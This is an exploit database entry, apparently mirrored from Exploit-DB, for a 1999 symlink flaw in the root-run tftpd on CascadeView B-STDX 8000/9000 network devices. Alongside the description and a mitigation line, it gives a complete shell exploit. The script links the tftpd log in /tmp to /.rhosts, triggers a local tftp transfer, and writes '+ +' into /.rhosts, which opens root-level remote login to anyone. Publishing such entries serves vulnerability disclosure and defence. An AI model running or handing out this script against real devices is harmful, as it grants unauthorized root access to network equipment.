CascadeView B-STDX 8000/9000 tftpd Vulnerability

vendor:

CascadeView B-STDX 8000/9000

by:

Loneguard

7.5

CVSS

HIGH

Symlink Attack

CWE

Product Name: CascadeView B-STDX 8000/9000

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1999

CascadeView B-STDX 8000/9000 tftpd Vulnerability

The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). It is possible for an attacker to link the log file to a file like /.rhosts to compromise elevated privileges on the device.

Mitigation:

Ensure that the tftpd_xfer_status.log file is not a symbolic link and is not writable by any user other than root.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/910/info

The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). It is possible for an attacker to link the log file to a file like /.rhosts to compromise elevated privileges on the device. It should be made clear that since this is a network device vulnerability, the consequences of compromise could be much greater to the network the device is on as a whole than if it were a single regular host.

#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts